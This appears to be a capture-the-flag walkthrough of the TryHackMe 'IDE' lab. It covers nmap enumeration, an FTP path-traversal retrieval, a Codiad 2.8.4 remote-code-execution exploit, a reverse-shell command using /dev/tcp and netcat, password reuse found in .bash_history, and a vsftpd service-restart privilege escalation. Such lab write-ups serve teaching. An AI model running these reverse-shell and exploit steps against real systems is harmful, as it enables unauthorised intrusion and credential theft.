Room Link: https://tryhackme.com/room/ide
Enumeration
Nmap
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.153.120
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e2:be:d3:3c:e8:76:81:ef:47:7e:d0:43:d4:28:14:28 (RSA)
| 256 a8:82:e9:61:e4:bb:61:af:9f:3a:19:3b:64:bc:de:87 (ECDSA)
|_ 256 24:46:75:a7:63:39:b6:3c:e9:f1:fc:a4:13:51:63:20 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
62337/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: B4A327D2242C42CF2EE89C623279665F
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Codiad 2.8.4FTP
Empty with anonymous login enabled. Using ftp we can use an old path traversal bypass to get some info based on the three dots
ftp> get /.../- file
local: file remote: /.../-
227 Entering Passive Mode (10,10,124,141,155,242).
150 Opening BINARY mode data connection for /.../- (151 bytes).
226 Transfer complete.
151 bytes received in 0.00 secs (3.2001 MB/s)
└─$ cat file
Hey john,
I have reset the password as you have asked. Please use the default password to login.
Also, please take care of the image file ;)
- drac.
We will keep that in mind for later.
Port 62337
Codiad
Possible exploits:
https://packetstormsecurity.com/files/162772/Codiad-2.8.4-Shell-Upload.html
https://packetstormsecurity.com/files/161944/Codiad-2.8.4-Remote-Code-Execution.html
Codiad install
CODIAD INSTALLATION
----------------------------------------------------------------------To install simply place the contents of the system in a web accessible
folder.Ensure that the following have write capabilities: /config.php
/data
/workspace
Navigate in your browser to the URL where the system is placed and the
installer screen will appear. If any dependencies have not been met the
system will alert you.Enter the requested information to create a user account, project, and
set your timezone and submit the form. If everything goes as planned
you will be greeted with a login screen.Happy coding!
RCE
https://packetstormsecurity.com/files/161944/Codiad-2.8.4-Remote-Code-Execution.html
I modified the script a bit to do ask y/n as it was broken so removed it and just made sure I had both commands running as in the script.
The commands. Run both in separate windows. (see image 1,2,3)
echo 'bash -c \"bash -i >/dev/tcp/IP/PORT 0>&1 2>&1\"' | nc -lnvp PORT
nc -lnvp PORTpython payload.py http://10.10.124.141:62337/ john password 10.8.153.120 9999 linux
Looking in the user's directory we can see the .bash_history holds some secrets..
cat drac/.bash_history
mysql -u drac -p '<REDACTED>'User
su drac
<REDACTED>Root
Sudo -l
User drac may run the following commands on ide:
(ALL : ALL) /usr/sbin/service vsftpd restart
/etc/systemd/system/multi-user.target.wants/vsftpd.service
systemctl daemon-reloadsudo /usr/sbin/service vsftpd restart
Box Complete!
